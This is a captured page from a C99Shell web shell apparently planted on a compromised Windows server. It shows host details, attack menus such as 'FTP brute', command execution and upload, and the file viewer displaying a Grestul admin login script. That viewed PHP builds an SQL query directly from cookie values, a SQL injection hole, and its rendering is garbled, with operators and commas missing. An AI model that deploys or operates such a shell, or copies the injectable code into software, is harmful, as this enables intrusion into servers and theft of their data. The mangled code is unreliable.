!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\comments\admin\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (1.84 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php ob_start();
/**
*  Copyright 2008 Grestul Group 
*  Powered by Grestul
*  admin panel creator: Imad
**/
require "inc/config.php";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
    <title><?php echo "$webad"; echo ' login'?></title>
      <link href="inc/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<?php
session_start
();
if(isset(
$_COOKIE['grestul'])) {

include 
'inc/config.php';

$username $_COOKIE['grestul']['username'];
$passcode $_COOKIE['grestul']['passcode'];

$query "SELECT user, pass FROM index WHERE user = '$username' AND pass = '$passcode'";
$result mysql_query($query$db);
if(
mysql_num_rows($result)) {
    
$_SESSION['loggedin'] = 1;
    
header('Location: home.php');
$_SESSION['valid_user'] = $username;
      }
    exit();
}

?>
        <div class="login">
        <div class="header">
        <div class="headertxt">Please Login to Grestul</div>
<div class="wrap">

<form method="post" name="login" action="login.php">

<p><label for="username">Username:</label><br />

<input class="input" type="text" name="username" id="username" tabindex="1" /></p>

<p><label for="passcode">Password:</label><br />

<input class="input" type="password" name="passcode" id="passcode" tabindex="2" /></p>

<div class="submitpos">
<input class="submit" type="submit" name="submit" value="Login" tabindex="3" /> 
</div>

</form>
</div>

<?php
if (isset($_GET['error'])) 
 {
    echo 
'<div class="error">';
    echo 
'No Valid session found!';
    echo 
'</div>';
 }

if (!empty(
$_GET['inv'])) {
    echo 
'<div class="error">';
    echo 
'Wrong Username or Password!';
    echo 
'</div>';
 }

?>
        </div>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--